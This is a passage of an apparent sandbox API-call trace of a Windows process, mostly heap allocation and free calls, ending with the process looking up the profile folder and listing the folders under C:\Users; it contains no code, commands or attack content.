lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.605] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.606] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.607] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.607] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.607] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.607] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.608] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.608] PathFindFileNameW (pszPath="") returned="" [0173.608] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.608] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.608] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.608] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c68 | out: hHeap=0x2c0000) returned 1 [0173.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59920 | out: hHeap=0x2c0000) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59920 [0173.609] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59920 | out: hHeap=0x2c0000) returned 1 [0173.609] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.609] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e348 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.609] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.609] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca068 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.609] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca0a0 [0173.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca0d8 [0173.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aca0a0 | out: hHeap=0x2c0000) returned 1 [0173.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.610] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0173.610] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59920 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59920 | out: hHeap=0x2c0000) returned 1 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca0a0 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x498) returned 0x3ac5b20 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59920 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c68 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a050 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ba0 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f10 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59f88 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59da8 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a028 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59dd0 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59880 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3cc8 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3cf0 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3d18 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3d40 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3d68 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3d90 [0173.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3db8 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3de0 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3e08 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3e30 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3ac3e58 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca110 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca148 [0173.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3aca180 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59d58 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59d08 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59998 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b78 | out: hHeap=0x2c0000) returned 1 [0173.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59e20 | out: 